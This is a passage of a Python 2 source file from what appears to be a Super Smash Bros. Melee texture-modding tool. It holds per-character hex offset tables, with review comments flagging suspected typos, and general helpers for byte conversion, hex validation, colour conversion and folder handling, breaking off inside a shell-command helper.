            (0x61664, 0x61880), (0x61884, 0x75aa0), (0x75aa4, 0x75cc0), (0x75cc4, 0x75ee0), (0x75ee4, 0x76100),
            (0x76104, 0x76320), (0x76324, 0x76340) ),
        'Wh': ( (0x20a60, 0x25560), (0x25564, 0x29780), (0x29784, 0x2ccc0), (0x2ccc4, 0x3aee0), (0x3aee4, 0x3f100),
            (0x3f104, 0x4c220), (0x4ce00, 0x61000), (0x61004, 0x61220), (0x61224, 0x61440), (0x61444, 0x61660),
            (0x61664, 0x61880), (0x61884, 0x75aa0), (0x75aa4, 0x75cc0), (0x75cc4, 0x75ee0), (0x75ee4, 0x76100),
            (0x76104, 0x76320), (0x76324, 0x76340) )
    },
    'Mario': { 'fullName': 'Mario', 'universe': 'Mario',
        'Bk': ( (0x1ad60, 0x35be0), (0x35be4, 0x43fa0), (0x448a0, 0x71aa0), (0x71aa4, 0x71cc0), (0x71cc4, 0x71ee0),
            (0x71ee4, 0x72100), (0x72104, 0x72320), (0x72324, 0x72340) ),
        'Bu': ( (0x1ad60, 0x35be0), (0x35be4, 0x43fa0), (0x448a0, 0x71aa0), (0x71aa4, 0x71cc0), (0x71cc4, 0x71ee0),
            (0x71ee4, 0x72100), (0x72104, 0x72320), (0x72324, 0x72340) ),
        'Gr': ( (0x1ad60, 0x35be0), (0x35be4, 0x43fa0), (0x448a0, 0x71aa0), (0x71aa4, 0x71cc0), (0x71cc4, 0x71ee0),
            (0x71ee4, 0x72100), (0x72104, 0x72320), (0x72324, 0x72340) ),
        'Nr': ( (0x1ad60, 0x35be0), (0x35be4, 0x43fa0), (0x448a0, 0x71aa0), (0x71aa4, 0x71cc0), (0x71cc4, 0x71ee0),
            (0x71ee4, 0x72100), (0x72104, 0x72320), (0x72324, 0x72340) ),
        'Ye': ( (0x1ad60, 0x35be0), (0x35be4, 0x43fa0), (0x448a0, 0x71aa0), (0x71aa4, 0x71cc0), (0x71cc4, 0x71ee0),
            (0x71ee4, 0x72100), (0x72104, 0x72320), (0x72324, 0x72340) )
    },
    'Mars': { 'fullName': 'Marth', 'universe': 'Fire Emblem',
        'Bk': ( (0x21d80, 0x40080), (0x40084, 0x442a0), (0x442a4, 0x454c0), (0x454c4, 0x4a6e0), (0x4a6e4, 0x4e900),
            (0x4e904, 0x65320), (0x65f20, 0x7a120), (0x7a124, 0x7a340), (0x7a344, 0x7a560), (0x7a564, 0x7a780),
            (0x7a784, 0x7a9a0), (0x7a9a4, 0x7a9c0), (0x7a9c0, 0x8ebc0), (0x8ebc4, 0x8ede0), (0x8ede4, 0x8f000),
            (0x8f004, 0x8f220), (0x8f224, 0x8f440), (0x8f444, 0x8f460) ),
        'Gr': ( (0x21d80, 0x40080), (0x40084, 0x442a0), (0x442a4, 0x454c0), (0x454c4, 0x4a6e0), (0x4a6e4, 0x4e900),
            (0x4e904, 0x65320), (0x65f20, 0x7a120), (0x7a124, 0x7a340), (0x7a344, 0x7a560), (0x7a564, 0x7a780),
            (0x7a784, 0x7a9a0), (0x7a9a4, 0x7a9c0), (0x7a9c0, 0x8ebc0), (0x8ebc4, 0x8ede0), (0x8ede4, 0x8f000),
            (0x8f004, 0x8f220), (0x8f224, 0x8f440), (0x8f444, 0x8f460) ),
        'Nr': ( (0x21d80, 0x40080), (0x40084, 0x442a0), (0x442a4, 0x454c0), (0x454c4, 0x4a6e0), (0x4a6e4, 0x4e900),
            (0x4e904, 0x65320), (0x65f20, 0x7a120), (0x7a124, 0x7a340), (0x7a344, 0x7a560), (0x7a564, 0x7a780),
            (0x7a784, 0x7a9a0), (0x7a9a4, 0x7a9c0), (0x7a9c0, 0x8ebc0), (0x8ebc4, 0x8ede0), (0x8ede4, 0x8f000),
            (0x8f004, 0x8f220), (0x8f224, 0x8f440), (0x8f444, 0x8f460) ),
        'Re': ( (0x21d80, 0x40080), (0x40084, 0x442a0), (0x442a4, 0x454c0), (0x454c4, 0x4a6e0), (0x4a6e4, 0x4e900),
            (0x4e904, 0x65320), (0x65f20, 0x7a120), (0x7a124, 0x7a340), (0x7a344, 0x7a560), (0x7a564, 0x7a780),
            (0x7a784, 0x7a9a0), (0x7a9a4, 0x7a9c0), (0x7a9c0, 0x8ebc0), (0x8ebc4, 0x8ede0), (0x8ede4, 0x8f000),
            (0x8f004, 0x8f220), (0x8f224, 0x8f440), (0x8f444, 0x8f460) ),
        'Wh': ( (0x21d80, 0x40080), (0x40084, 0x442a0), (0x442a4, 0x454c0), (0x454c4, 0x4a6e0), (0x4a6e4, 0x4e900),
            (0x4e904, 0x65320), (0x65f20, 0x7a120), (0x7a124, 0x7a340), (0x7a344, 0x7a560), (0x7a564, 0x7a780),
            (0x7a784, 0x7a9a0), (0x7a9a4, 0x7a9c0), (0x7a9c0, 0x8ebc0), (0x8ebc4, 0x8ede0), (0x8ede4, 0x8f000),
            (0x8f004, 0x8f220), (0x8f224, 0x8f440), (0x8f444, 0x8f460) )
    },
    'Mewtwo': { 'fullName': 'Mewtwo', 'universe': 'Pokemon',
        'Bu': ( (0x19540, 0x2eb40), (0x2f440, 0x3d440) ),
        'Gr': ( (0x19540, 0x2eb40), (0x2f440, 0x3d440) ),
        'Nr': ( (0x19540, 0x2eb40), (0x31440, 0x3f440) ), # Also contains an additional eye texture, at (0x2f440, 0x31440), not present in the other color files.
        'Re': ( (0x19540, 0x2eb40), (0x2f440, 0x3d440) )
    },
    'Nana': { 'fullName': 'Nana (Ice Climbers)', 'universe': 'Ice Climber',
        'Aq': ( (0x107c0, 0x3c4c0), (0x3cb40, 0x54b40) ),
        'Nr': ( (0x10800, 0x3c500), (0x3cb80, 0x54b80) ),
        'Wh': ( (0x107c0, 0x3c4c0), (0x3cb40, 0x54b40) ),
        'Ye': ( (0x107e0, 0x3c4e0), (0x3cb60, 0x54b60) )
    },
    'Ness': { 'fullName': 'Ness', 'universe': 'EarthBound',
        'Bu': ( (0x1d220, 0x51a20), (0x52300, 0x5a300) ),
        'Gr': ( (0x1d220, 0x51a20), (0x52300, 0x5a300) ),
        'Nr': ( (0x1cae0, 0x512e0), (0x51b80, 0x59b80) ),
        'Ye': ( (0x1d200, 0x51a00), (0x522e0, 0x5a2e0) ),
    },
    'Pichu': { 'fullName': 'Pichu', 'universe': 'Pokemon',
        'Bu': ( (0x1e800, 0x1f020), (0x1f020, 0x28820), (0x28c20, 0x2ac20), (0x2b320, 0x37320) ),
        'Gr': ( (0x16b00, 0x17320), (0x2c320, 0x35b20), (0x3db20, 0x3fb20), (0x40240, 0x4c240) ),
        'Nr': ( (0x101c0, 0x109e0), (0x109e0, 0x1a1e0), (0x1a1e0, 0x1c1e0), (0x1c7e0, 0x287e0) ),
        'Re': ( (0x151e0, 0x15a00), (0x15a00, 0x1f200), (0x1f200, 0x21200), (0x25840, 0x31840) )
    },
    'Peach': { 'fullName': 'Peach', 'universe': 'Mario',
        'Bu': ( (0x221c0, 0x263c0), (0x263c4, 0x294e0), (0x294e0, 0x29ac0), (0x29ac4, 0x2a080), (0x2a084, 0x2a0a0),
            (0x2a0a0, 0x2b8c0), (0x2b8c0, 0x2ce20), (0x2ce24, 0x2de40), (0x2de40, 0x2e7c0), (0x2e7c4, 0x329e0),
            (0x329e4, 0x3ec00), (0x3ec04, 0x42e20), (0x42e24, 0x4c740), (0x4c740, 0x4ec40), (0x4ec44, 0x55860),
            (0x55864, 0x5d380), (0x5d384, 0x680a0), (0x680a4, 0x6a4c0), (0x6b160, 0xc3160) ),
        'Gr': ( (0x221c0, 0x263c0), (0x263c4, 0x294e0), (0x294e0, 0x29ac0), (0x29ac4, 0x2a080), (0x2a084, 0x2a0a0),
            (0x2a0a0, 0x2b8c0), (0x2b8c0, 0x2ce20), (0x2ce24, 0x2de40), (0x2de40, 0x2e720), (0x2e724, 0x32940),
            (0x32944, 0x3eb60), (0x3eb64, 0x42d80), (0x42d84, 0x4c6a0), (0x4c6a0, 0x4ebc0), (0x4ec44, 0x557e0),
            (0x557e4, 0x5d300), (0x5d304, 0x68020), (0x68024, 0x6a440), (0x6b0e0, 0xc30e0) ),
        'Nr': ( (0x221c0, 0x263c0), (0x263c4, 0x294e0), (0x294e0, 0x29ae0), (0x29ae4, 0x2a100), (0x2a104, 0x2a120),
            (0x2a120, 0x2b940), (0x2b940, 0x2d780), (0x2d784, 0x2e7a0), (0x2e7a0, 0x2f1a0), (0x2f1a4, 0x333c0),
            (0x333c4, 0x3f5e0), (0x3f5e4, 0x43800), (0x43804, 0x4d120), (0x4d120, 0x4f720), (0x4f724, 0x56340),
            (0x56344, 0x5de60), (0x5de64, 0x68b80), (0x68b84, 0x6afa0), (0x6bc40, 0xc3c40) ),
        'Wh': ( (0x221c0, 0x263c0), (0x263c4, 0x294e0), (0x294e0, 0x29a00), (0x29a04, 0x29fc0), (0x29fc4, 0x29fe0),
            (0x29fe0, 0x2b800), (0x2b800, 0x2ce00), (0x2ce04, 0x2de20), (0x2de20, 0x2e700), (0x2e704, 0x32920),
            (0x32924, 0x3eb40), (0x3eb44, 0x42d60), (0x42d64, 0x4eb80), (0x4eb80, 0x4eb80), (0x4eb84, 0x557a0),
            (0x557a4, 0x5d2c0), (0x5d2c4, 0x67fe0), (0x67fe4, 0x6a400), (0x6b0a0, 0xc30a0) )
        #'Ye': ( ) Too many changes from above to track. Will need to be manually converted.
    },
    'Pikachu': { 'fullName': 'Pikachu', 'universe': 'Pokemon',
        'Bu': ( (0x15840, 0x15860), (0x19860, 0x1d360), (0x1d9c0, 0x256c0) ),
        'Gr': ( (0x15f40, 0x15f60), (0x19f60, 0x1da60), (0x1e0c0, 0x25dc0) ),
        'Nr': ( (0x14160, 0x14180), (0x14180, 0x17c80), (0x182a0, 0x1ffa0) ),
        'Re': ( (0x15280, 0x152a0), (0x1baa0, 0x1f5a0), (0x1fc20, 0x27920) )
    },
    'Popo': { 'fullName': 'Popo (Ice Climbers)', 'universe': 'Ice Climber',
        'Gr': ( (0x10780, 0x3c480), (0x3cb00, 0x54b00) ),
        'Nr': ( (0x10780, 0x3c480), (0x3cb00, 0x54b00) ),
        'Or': ( (0x10780, 0x3c480), (0x3cb00, 0x54b00) ),
        'Re': ( (0x107e0, 0x3c4e0), (0x3cb60, 0x54b60) )
    },
    'Purin': { 'fullName': 'Jigglypuff', 'universe': 'Pokemon',
        'Bu': ( (0x11b80, 0x13ba0), (0x13ba0, 0x17ce0), (0x17ce4, 0x19900),
            (0x19ea0, 0x2dfe0), (0x2dfe4, 0x2e120), (0x2e124, 0x2e2a0), (0x2e2a4, 0x2e400), (0x2e404, 0x2e560),
            (0x2e564, 0x3a6c0), (0x3a6c4, 0x3a800), (0x3a804, 0x3a980), (0x3a984, 0x3a9a0) ),
        'Gr': ( (0x11b80, 0x13ba0), (0x13ba0, 0x17ce0), (0x17ce4, 0x19900),
            (0x19ea0, 0x2dfe0), (0x2dfe4, 0x2e120), (0x2e124, 0x2e2a0), (0x2e2a4, 0x2e400), (0x2e404, 0x2e560),
            (0x2e564, 0x3a6c0), (0x3a6c4, 0x3a800), (0x3a804, 0x3a980), (0x3a984, 0x3a9a0) ),
        'Nr': ( (0x11b80, 0x13ba0), (0x13ba0, 0x17da0), (0x17dc0, 0x199c0),
            (0x19f60, 0x2e160), (0x2e164, 0x2e380), (0x2e384, 0x2e5a0), (0x2e5a4, 0x2e7c0), (0x2e7c4, 0x2e9e0),
            (0x2e9e4, 0x3ac00), (0x3ac04, 0x3ae20), (0x3ae24, 0x3b040), (0x3b044, 0x3b060) ),
        'Re': ( (0x11b80, 0x13ba0), (0x13ba0, 0x17ce0), (0x17ce4, 0x19900),
            (0x19ea0, 0x2dfe0), (0x2dfe4, 0x2e120), (0x2e124, 0x2e2a0), (0x2e2a4, 0x2e400), (0x2e404, 0x2e560),
            (0x2e564, 0x3a6c0), (0x3a6c4, 0x3a800), (0x3a804, 0x3a980), (0x3a984, 0x3a9a0) ),
        'Ye': ( (0x11b80, 0x13ba0), (0x13ba0, 0x17ce0), (0x17ce4, 0x19900),
            (0x19ea0, 0x2dfe0), (0x2dfe4, 0x2e120), (0x2e124, 0x2e2a0), (0x2e2a4, 0x2e400), (0x2e404, 0x2e560),
            (0x2e564, 0x3a6c0), (0x3a6c4, 0x3a800), (0x3a804, 0x3a980), (0x3a984, 0x3a9a0) )
    },
    'Seak': { 'fullName': 'Sheik', 'universe': 'The Legend of Zelda',
        'Bu': ( (0x1c5e0, 0x2c700), (0x2c700, 0x34900), (0x34904, 0x38b20), (0x38b24, 0x3cd40), (0x3cd44, 0x43100),
            (0x43a20, 0x4f020), (0x4f024, 0x4f240), (0x4f244, 0x4f460), (0x4f464, 0x4f680), (0x4f684, 0x4f8a0),
            (0x4f8a4, 0x5aec0), (0x5aec4, 0x5b0e0), (0x5b0e4, 0x5b300), (0x5b304, 0x5b520), (0x5b524, 0x5b740), (0x5b744, 0x5b760) ),
        'Gr': ( (0x1c5e0, 0x2c700), (0x2c700, 0x348a0), (0x348a4, 0x38ac0), (0x38ac4, 0x3cce0), (0x3cce4, 0x430a0),
            (0x439c0, 0x4efc0), (0x4efc4, 0x4f1e0), (0x4f1e4, 0x4f400), (0x4f404, 0x4f620), (0x4f624, 0x4f840),
            (0x4f844, 0x5ae60), (0x5ae64, 0x5b080), (0x5b084, 0x5b2a0), (0x5b2a4, 0x5b4c0), (0x5b4c4, 0x5b6e0), (0x5b6e4, 0x5b700) ),
        'Nr': ( (0x1c5e0, 0x2c700), (0x2c700, 0x34900), (0x34904, 0x38b20), (0x38b24, 0x3cd40), (0x3cd44, 0x43100),
            (0x43a20, 0x4f020), (0x4f024, 0x4f240), (0x4f244, 0x4f460), (0x4f464, 0x4f680), (0x4f684, 0x4f8a0),
            (0x4f8a4, 0x5aec0), (0x5aec4, 0x5b0e0), (0x5b0e4, 0x5b300), (0x5b304, 0x5b520), (0x5b524, 0x5b740), (0x5b744, 0x5b760) ),
        'Re': ( (0x1c5e0, 0x2c700), (0x2c700, 0x34860), (0x34864, 0x38a80), (0x38a84, 0x3cca0), (0x3cca4, 0x43060),
            (0x43980, 0x4ef80), (0x4ef84, 0x4f1a0), (0x4f1a4, 0x4f3c0), (0x4f3c4, 0x4f5e0), (0x4f5e4, 0x4f800),
            (0x4f804, 0x4ae20), (0x4ae24, 0x5b040), (0x5b044, 0x5b260), (0x5b264, 0x5b480), (0x5b484, 0x5b6a0), (0x5b6a4, 0x5b6c0) ), # NOTE(review): (0x4f804, 0x4ae20) ends before it starts -- possibly a typo for 0x5ae20 (compare 'Gr'/'Nr'); verify
        'Wh': ( (0x1c5e0, 0x2c700), (0x2c700, 0x34900), (0x34904, 0x38b20), (0x38b24, 0x3cd40), (0x3cd44, 0x43100),
            (0x43a20, 0x4f020), (0x4f024, 0x4f240), (0x4f244, 0x4f460), (0x4f464, 0x4f680), (0x4f684, 0x4f8a0),
            (0x4f8a4, 0x5aec0), (0x5aec4, 0x5b0e0), (0x5b0e4, 0x5b300), (0x5b304, 0x5b520), (0x5b524, 0x5b740), (0x5b744, 0x5b760) )
    },
    'Samus': { 'fullName': 'Samus', 'universe': 'Metroid',
        'Bk': ( (0x29b20, 0x2dd20), (0x2dd20, 0x2e520), (0x2e520, 0x3b420), (0x3b420, 0x3bc20), (0x3bc20, 0x608a0) ),
        'Gr': ( (0x29b20, 0x2dd20), (0x2dd20, 0x2fd20), (0x2fd20, 0x3cc20), (0x3cc20, 0x3d420), (0x3d420, 0x620a0) ),
        'La': ( (0x29b20, 0x2dd20), (0x2dd20, 0x2e520), (0x2e520, 0x3b420), (0x3b420, 0x3bc20), (0x3bc20, 0x608a0) ),
        'Nr': ( (0x29b20, 0x2dd20), (0x2dd20, 0x2e520), (0x2e520, 0x3b420), (0x3b420, 0x3bc20), (0x3bc20, 0x608a0) ),
        'Pi': ( (0x29b20, 0x2dd20), (0x2dd20, 0x2e520), (0x2e520, 0x3b420), (0x3b420, 0x3d420), (0x3d420, 0x620a0) )
    },
    'Yoshi': { 'fullName': 'Yoshi', 'universe': 'Yoshi',
        'Aq': ( (0x23fe0, 0x25fe0), (0x25fe0, 0x2a060), (0x2a064, 0x2a080), (0x2a080, 0x2e080), (0x2e080, 0x30080), (0x30080, 0x32080),
            (0x32080, 0x35de0), (0x35de0, 0x37ac0), (0x37ac4, 0x37ae0), (0x37ae0, 0x38d20), (0x38d24, 0x38d40), (0x38d40, 0x3c6e0), (0x3c6e4, 0x3c700), (0x3c700, 0x3cc00), (0x3cc00, 0x3dc00),
            (0x3dc00, 0x3ec20), (0x3ec24, 0x3ec40), (0x3ec40, 0x40d20), (0x40d24, 0x40d40), (0x40d40, 0x41d00), (0x42580, 0x46580) ),
        'Bu': ( (0x2ed40, 0x30d40), (0x30d40, 0x34dc0), (0x34dc4, 0x34de0), (0x25fe0, 0x29fe0), (0x34de0, 0x36de0), (0x23fe0, 0x25fe0),
            (0x29fe0, 0x2dd40), (0x36de0, 0x38a80), (0x38a84, 0x38aa0), (0x38aa0, 0x39cc0), (0x39cc4, 0x39ce0), (0x39ce0, 0x3d680), (0x3d684, 0x3d6a0), (0x3d6a0, 0x3dba0), (0x2dd40, 0x2ed40),
            (0x3dba0, 0x3ebc0), (0x3ebc4, 0x3ebe0), (0x3ebe0, 0x40c40), (0x40c44, 0x40c60), (0x40c60, 0x41c20), (0x424a0, 0x464a0) ),
        'Nr': ( (0x23fc0, 0x25fc0), (0x25fc0, 0x2a040), (0x2a044, 0x2a060), (0x2a060, 0x2e060), (0x2e060, 0x30060), (0x30060, 0x32060),
            (0x32060, 0x35dc0), (0x35dc0, 0x37a40), (0x37a44, 0x37a60), (0x37a60, 0x38c80), (0x38c84, 0x38ca0), (0x38ca0, 0x3c640), (0x3c644, 0x3c660), (0x3c660, 0x3cb60), (0x3cb60, 0x3db60),
            (0x3db60, 0x3eb80), (0x3eb84, 0x3eba0), (0x3eba0, 0x40be0), (0x40be4, 0x40c00), (0x40c00, 0x41bc0), (0x42440, 0x46440) ),
        'Pi': ( (0x23fe0, 0x25fe0), (0x25fe0, 0x2a060), (0x2a064, 0x2a080), (0x2a080, 0x2e080), (0x2e080, 0x30080), (0x30080, 0x32080),
            (0x32080, 0x35de0), (0x35de0, 0x37ae0), (0x37ae4, 0x37b00), (0x37b00, 0x38d20), (0x38d24, 0x38d40), (0x38d40, 0x3c6e0), (0x3c6e4, 0x3c700), (0x3c700, 0x3cc00), (0x3cc00, 0x3dc00),
            (0x3dc00, 0x3ec20), (0x3ec24, 0x3ec40), (0x3ec40, 0x40d20), (0x40d24, 0x40d40), (0x40d60, 0x41d20), (0x425a0, 0x465a0) ),
        'Re': ( (0x30d00, 0x32d00), (0x32d00, 0x36d80), (0x36d84, 0x36da0), (0x25fa0, 0x29fa0), (0x23fa0, 0x25fa0), (0x29fa0, 0x2bfa0),
            (0x2bfa0, 0x2fd00), (0x36da0, 0x38aa0), (0x38aa4, 0x38ac0), (0x38ac0, 0x39ce0), (0x39ce4, 0x39d00), (0x39d00, 0x3d6a0), (0x3d6a4, 0x3d6c0), (0x3d6c0, 0x3dbc0), (0x2fd00, 0x30d00),
            (0x3dbc0, 0x3ebe0), (0x3ebe4, 0x3ec00), (0x3ec00, 0x40d80), (0x40d84, 0x40da0), (0x40da0, 0x41d60), (0x425e0, 0x465e0) ),
        'Ye': ( (0x2fd40, 0x31d40), (0x3cca0, 0x40d20), (0x40d24, 0x40d40), (0x25fe0, 0x29fe0), (0x23fe0, 0x25fe0), (0x29fe0, 0x2bfe0),
            (0x2bfe0, 0x2fd40), (0x31d40, 0x33a20), (0x33a24, 0x33a40), (0x33a40, 0x34c60), (0x34c64, 0x34c80), (0x34c80, 0x38620), (0x38624, 0x38640), (0x38640, 0x38b40), (0x38b40, 0x39b40),
            (0x39b40, 0x3ab60), (0x3ab64, 0x3ab80), (0x3ab80, 0x3cc80), (0x3cc84, 0x3cca0), (0x40d40, 0x41d00), (0x42580, 0x46580) )
    },
    'Zelda': { 'fullName': 'Zelda', 'universe': 'The Legend of Zelda',
        'Bu': ( (0x1db60, 0x235a0), (0x235a0, 0x23ea0), (0x23ea0, 0x24ea0), (0x24ea0, 0x25fa0), (0x25fa4, 0x25fc), (0x25fc0, 0x39940), # NOTE(review): (0x25fa4, 0x25fc) ends before it starts -- possibly a typo for 0x25fc0 (compare 'Nr'/'Wh'); verify
            (0x39940, 0x3a940), (0x3a940, 0x41ee0), (0x429c0, 0x529c0) ),
        'Gr': ( (0x1db60, 0x235a0), (0x235a0, 0x23ea0), (0x23ea0, 0x24ea0), (0x24ea0, 0x25fa0), (0x25fa4, 0x25fc), (0x25fc0, 0x39940), # NOTE(review): same suspect range as 'Bu'
            (0x39940, 0x3a940), (0x3a940, 0x41ee0), (0x429c0, 0x529c0) ),
        'Nr': ( (0x1db60, 0x235a0), (0x235a0, 0x23ea0), (0x23ea0, 0x24ea0), (0x24ea0, 0x260a0), (0x260a4, 0x260c0), (0x260c0, 0x39a40),
            (0x39a40, 0x3bba0), (0x3bba0, 0x43140), (0x43c20, 0x53c20) ),
        'Re': ( (0x1db60, 0x235a0), (0x235a0, 0x23ea0), (0x23ea0, 0x24ea0), (0x24ea0, 0x25fa0), (0x25fa4, 0x25fc), (0x25fc0, 0x39940), # NOTE(review): same suspect range as 'Bu'
            (0x39940, 0x3a940), (0x3a940, 0x41ee0), (0x429c0, 0x529c0) ),
        'Wh': ( (0x1db60, 0x235a0), (0x235a0, 0x24da0), (0x24da0, 0x25da0), (0x25da0, 0x26ea0), (0x26ea4, 0x26ec0), (0x26ec0, 0x3a840),
            (0x3a840, 0x3b840), (0x3b840, 0x42de0), (0x438c0, 0x538c0) )
    }
}
#===========================#
# ~ ~ General Functions ~ ~ #
#===========================#
def isNaN( var ): # Test if a variable 'is Not a Number'
	""" Returns True if the given value cannot be interpreted as a number.

		Previously only ValueError was caught, so probing a non-castable type
		(e.g. None, or a list read from a corrupt settings value) raised an
		uncaught TypeError; both now safely report 'not a number'. """
	try:
		float( var )
		return False
	except ( ValueError, TypeError ):
		return True
def roundTo32( x, base=32 ):
	""" Rounds x up to the nearest multiple of base (32 by default). """
	multiples = math.ceil( float(x) / base )
	return int( multiples * base )
# def CRC32_from_file( filename ):
# buf = open( filename, 'rb').read()
# buf = (binascii.crc32( buf ) & 0xFFFFFFFF)
# return "%08X" % buf
def uHex( integer ):
	""" Quick hex conversion which shows uppercase digits; e.g. 26 -> '0x1A'. """
	return '0x' + format( integer, 'X' )
# def float_to_hex( floatValue ):
# """ Converts a float to its hex representation, padded to 8 characters. """
# return '{0:0{1}X}'.format( struct.unpack('<I', struct.pack( '<f', floatValue ))[0], 8 )
def toInt( input ): # Converts a 1, 2, or 4 bytes object or bytearray to an integer.
	""" Converts a 1, 2, or 4 byte bytes object or bytearray to an unsigned,
		big-endian integer. Raises an Exception for any other input.

		Previously any length other than 1 or 2 fell through to the 4-byte
		unpack, so e.g. a 3-byte input failed obscurely inside struct; it now
		reaches the same clear error message directly. """
	try:
		byteLength = len( input )
		if ( byteLength == 1 ): return struct.unpack( '>B', input )[0] # big-endian unsigned char (1 byte)
		elif ( byteLength == 2 ): return struct.unpack( '>H', input )[0] # big-endian unsigned short (2 bytes)
		elif ( byteLength == 4 ): return struct.unpack( '>I', input )[0] # big-endian unsigned int (4 bytes)
		else:
			raise ValueError( 'Unsupported byte length: ' + str(byteLength) )
	except:
		raise Exception( '\ntoInt was not able to convert the ' + str(type(input))+' type' )
def toBytes( input, byteLength=4, cType='' ): # Converts an int to a bytes object
	""" Packs an integer into a big-endian bytes object of the given length,
		or uses the explicit struct format string in cType if one is given. """
	if not cType: # Choose a big-endian unsigned format based on the byte length
		formatCodes = { 1: '>B', 2: '>H', 4: '>I' } # char / short / int
		if byteLength not in formatCodes:
			raise Exception( '\ntoBytes was not able to convert the ' + str(type(input))+' type' )
		cType = formatCodes[byteLength]
	return struct.pack( cType, input )
# Conversion solutions:
# int -> bytes objects struct.pack( )
# byte string -> int: struct.unpack( )
# byte string -> hex string .encode( 'hex' )
# bytearray -> hex string: hexlify( input )
# hex string -> bytearray: bytearray.fromhex( input )
# text string -> bytearray init bytearray, then use .extend( string ) method on it
# Note that a file object's .read() method returns a byte-string of unknown encoding, which will be
# locally interpreted as it's displayed. It should be properly decoded to a standard to be operated on.
#
# Note 2: In python 2, bytes objects are an alias for str objects; they are not like bytearrays.
def validOffset( offset ): # Accepts a string.
	""" Returns True if the given string (with or without a '0x' prefix)
		consists only of hexadecimal digits. An empty string is invalid. """
	hexString = offset.replace( '0x', '' )
	if not hexString:
		return False
	for character in hexString:
		if character not in hexdigits:
			return False
	return True
def grammarfyList( theList ):
	""" Converts a list to a grammatical English string; for example, the list
		[apple, pear, banana] becomes the string 'apple, pear, and banana'.

		Fixes two defects: an empty list previously produced the string ', and ',
		and non-string items were only str()-converted in the 1- and 2-element
		branches (the 3+ branch raised a TypeError inside join). """
	if not theList: return ''
	elif len(theList) == 1: return str(theList[0])
	elif len(theList) == 2: return str(theList[0]) + ' and ' + str(theList[1])
	else:
		# Join all but the last item, then attach the last with an Oxford comma
		return ', '.join( str(item) for item in theList[:-1] ) + ', and ' + str(theList[-1])
def msg( *args ):
	""" Shows a simple info message box. The first argument is the message body;
		if more than one argument is given, the last one is used as the window title. """
	message = args[0]
	if len( args ) < 2:
		tkMessageBox.showinfo( message=message )
	else:
		tkMessageBox.showinfo( message=message, title=args[-1] )
def copyToClipboard( text ):
	""" Replaces the system clipboard contents with the given text. """
	rootWindow = Gui.root
	rootWindow.clipboard_clear()
	rootWindow.clipboard_append( text )
def humansize(nbytes): # Used for converting file sizes, in terms of human readability.
	""" Converts a byte count to a human-readable size string; e.g. 2048 -> '2 KB'. """
	if nbytes == 0: return '0 B'
	suffixes = ['B', 'KB', 'MB', 'GB', 'TB', 'PB']
	size = float( nbytes )
	magnitude = 0
	# Step up through the suffixes until the value drops below 1024 (or we run out)
	while size >= 1024 and magnitude < len(suffixes)-1:
		size /= 1024.
		magnitude += 1
	# Trim trailing zeros, and the decimal point itself if nothing follows it
	formatted = ('%.2f' % size).rstrip('0').rstrip('.')
	return '%s %s' % (formatted, suffixes[magnitude])
def createFolders( folderPath ):
	""" Creates the given folder path (including any intermediate folders).
		An already-existing folder is not an error; anything else re-raises. """
	try:
		os.makedirs( folderPath )
		# Primitive failsafe to prevent race condition
		attemptsRemaining = 11
		while not os.path.exists( folderPath ):
			time.sleep( .3 )
			if attemptsRemaining == 0:
				raise Exception( 'Unable to create folder: ' + folderPath )
			attemptsRemaining -= 1
	except OSError as error: # Python >2.5
		# Ignore 'already exists'; re-raise anything else
		if error.errno != errno.EEXIST or not os.path.isdir( folderPath ):
			raise
def validHex( offset ): # Accepts a string.
	""" Returns True if the given string (with or without a '0x' prefix)
		is entirely composed of hexadecimal digits; False for an empty string. """
	hexString = offset.replace( '0x', '' )
	if hexString == '':
		return False
	return not any( character not in hexdigits for character in hexString )
def rgb2hex( color ): # Input can be RGB or RGBA, but output will still be RGB
	""" Converts a color iterable of 0-255 channel values to a '#rrggbb' hex string.
		Any alpha channel present is ignored. """
	return '#%02x%02x%02x' % ( color[0], color[1], color[2] )
def rgb2hsv( color ):
	""" Converts a color from RGB(A) to HSV.

		color: an indexable of 0-255 channel values; RGB or RGBA (alpha, if present, is ignored).
		Returns a tuple of ( hue, saturation, value ), with hue in degrees [0, 360)
		and saturation/value in [0, 1].

		Generalized from the original, which required exactly 4 channels to unpack
		and raised a ValueError on plain RGB input (even though rgb2hex accepts both). """
	r, g, b = color[0]/255.0, color[1]/255.0, color[2]/255.0
	mx = max(r, g, b)
	mn = min(r, g, b)
	df = mx-mn
	# Hue depends on which channel dominates
	if mx == mn: h = 0 # Grayscale; hue is undefined, so default to 0
	elif mx == r: h = (60 * ((g-b)/df) + 360) % 360
	elif mx == g: h = (60 * ((b-r)/df) + 120) % 360
	else: h = (60 * ((r-g)/df) + 240) % 360 # mx == b
	# Black has no saturation (avoids division by zero)
	if mx == 0: s = 0
	else: s = df/mx
	v = mx
	return ( h, s, v )
def hex2rgb( inputStr ): # Expects RRGGBBAA
	""" Returns a tuple of ( (r,g,b,a), parsingError ) parsed from an RRGGBBAA hex string.
		parsingError is True unless the string contains exactly four valid hex byte pairs.

		Fix: replaced Python-2-only xrange with range (identical iteration behavior
		in Python 2, and portable to Python 3). """
	inputStr = inputStr.replace( '#', '' )
	channelsList = []
	parsingError = False
	if len( inputStr ) % 2 != 0: # Checks whether the string is an odd number of characters
		parsingError = True
	else:
		for i in range( 0, len(inputStr), 2 ): # Iterate by 2 over the length of the input string
			try:
				byte = inputStr[i:i+2]
				newInt = int( byte, 16 )
				if newInt > -1 and newInt < 256: channelsList.append( newInt )
			except:
				parsingError = True
				break
		else: # Got through the above loop with no break. Still got one more check.
			if len( channelsList ) != 4: parsingError = True # Must be exactly RGBA
	return ( tuple(channelsList), parsingError )
def getLuminance( hexColor ):
	""" Computes the perceived brightness (0-255) of an RRGGBBAA hex color string,
		weighted by its alpha channel. Uses Rec. 601 luma coefficients. """
	r, g, b, a = hex2rgb( hexColor )[0]
	luma = r*0.299 + g*0.587 + b*0.114
	return luma * a/255
def findBytes( bytesRange, target ): # Searches a bytearray for a given (target) set of bytes, and returns the location (index)
	""" Returns the index of the first occurrence of target within bytesRange, or -1 if absent.

		Uses bytearray.find, which performs the same scan as the previous
		Python-level slice-compare loop but at C speed (O(n) vs O(n*m)). """
	return bytesRange.find( target )
def cmdChannel( command, standardInput=None, shell=True ):
	""" IPC (Inter-Process Communication) to command line.
		shell=True gives access to all shell features.
		creationFlags=0x08000000 prevents creation of a console for the process.

		Returns a tuple of ( exitCode, output ): stdout on success (exit code 0),
		stderr on failure. """
	# NOTE(review): creationflags=0x08000000 (CREATE_NO_WINDOW) is Windows-only;
